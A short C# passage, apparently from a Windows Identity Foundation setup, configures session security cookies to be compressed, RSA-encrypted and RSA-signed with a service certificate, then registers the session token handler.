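            CookieTransform[] transforms =
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(serviceCertificate),
                new RsaSignatureCookieTransform(serviceCertificate)
            };
            var sessionHandler = new SessionSecurityTokenHandler(new List<CookieTransform>(transforms).AsReadOnly());

            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
        }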